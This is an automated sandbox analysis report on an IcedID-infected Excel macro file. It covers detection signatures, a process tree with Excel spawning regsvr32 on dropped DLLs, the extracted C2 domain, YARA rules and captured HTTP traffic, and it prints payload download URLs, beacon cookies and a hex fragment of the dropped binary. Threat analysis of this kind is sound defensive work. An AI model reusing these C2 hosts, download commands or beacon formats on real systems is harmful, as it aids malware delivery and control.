Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report sbf0127365-7431059.xlsm

Overview

General Information

Sample Name:sbf0127365-7431059.xlsm
Analysis ID:444703
MD5:184ff7a1642ad86b81cc2067f92cfa9d
SHA1:6362f03ec8cdf762058724459668c9460c692b9c
SHA256:159596a25327a7ca8531fa0d326c3d80fac14b3732a6ec33e2ba5339fdbce9df
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1228 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2808 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2996 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3068 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000003.00000002.2102276983.0000000000110000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000006.00000002.2118500619.00000000000A0000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000004.00000002.2109562092.0000000000190000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.regsvr32.exe.a0000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        3.2.regsvr32.exe.110000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        3.2.regsvr32.exe.220000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        6.2.regsvr32.exe.a0000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        6.2.regsvr32.exe.1b0000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        Click to see the 4 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1228, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2808

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 6.2.regsvr32.exe.a0000.0.raw.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2808, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2996, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

        Software Vulnerabilities:

        barindex
        Document exploit detected (creates forbidden files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to behavior
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
        Document exploit detected (UrlDownloadToFile)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
        Source: global trafficDNS query: name: thousandsyears.download
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: astrocycle.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:34:15 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 5885Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NQa%2FToNAe4OfSycDITeTcPRjCr99aolaLqyUrPFMG%2FPw1ZIxGpsbT0mJx%2FvTchvs%2BxnkydQR5YNN1ucst5YESuFDECWoL7Oed1NuA59e7643MxlLh0PYHC8Rt9YvlJfrDvHmcm4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a935a2ea894e3d-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:34:15 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 5884Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Br5qITmK7KR5WQ%2BEK2GUF2OhhE7oHZy%2BBwGeVnakesJB4CD5KzwejZeo0P7vlpLpiZAX1mffAGTgFj1rIfVTNTMySqnj%2FLTQ8o21f3gYa3WSAFzGyLaJ9qmj9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a935a45e4a4a92-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:34:16 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 5884Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=tdPcIrAE2vvRZYKG1Z8MC4h5F2uk1HO2YqdWJntIaNZoAwTqS6xEVG4oGGJckRbzpb9ReFxkZ%2F6BeyScK5hi57sdBxfviydzcXbmfgwcCsJ5BcBTSQ9zc0B04Gc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a935a5daf92c2a-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5201:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:31303745413343414446434341313538; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5205:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:44384136334637384333384532304645; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5209:47; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:32324339344139363335433034463745; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDBE85F.pngJump to behavior
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5201:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:31303745413343414446434341313538; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5205:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:44384136334637384333384532304645; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5209:47; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:32324339344139363335433034463745; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com 